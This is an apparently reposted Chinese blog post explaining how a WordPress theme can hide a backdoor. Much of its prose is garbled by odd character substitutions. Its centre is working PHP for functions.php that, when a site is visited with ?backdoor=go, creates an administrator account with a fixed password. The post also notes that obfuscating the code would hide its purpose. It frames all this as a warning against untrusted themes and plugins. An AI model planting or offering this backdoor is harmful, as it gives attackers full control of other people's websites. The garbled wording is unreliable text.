是不是在许多场所传闻事后门(Backdoor),出格是一些高科技的影戏内里,那些系统可能措施的作者城市通过本身留下的后门来拯救世界。其实措施的后门留我们基础不远,其实你用的许多软件可能措施都是有后门的,下面给各人演示的一个很简朴的案例,就可以给 WordPress 站点留下后门,获取打点员权限,虽然这只是一篇解说文章,小我私家强烈你在利用 WordPress 帮人作网站的时候,千万不要这样做。
<?phpadd_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
} 好比在主题的 functions.php 文件中添加以上代码,就可以给 WordPress 添加一个可以或许建设打点员的后门,只需会见 ?backdoor=go,然后就建设了一个用户名为“backdoor”,暗码为:“pa55w0rd!” 的打点员。
假如在把上面这段代码加密一下,许多用户就基础不知道这段代码是做什么的,所以强烈发起各人不要随便去下载一些来路不明的 WordPress 主题和插件,说不定就给你的站点安装了一个后门。
本文转载于:
WordPress v4.4.2 英文版下载
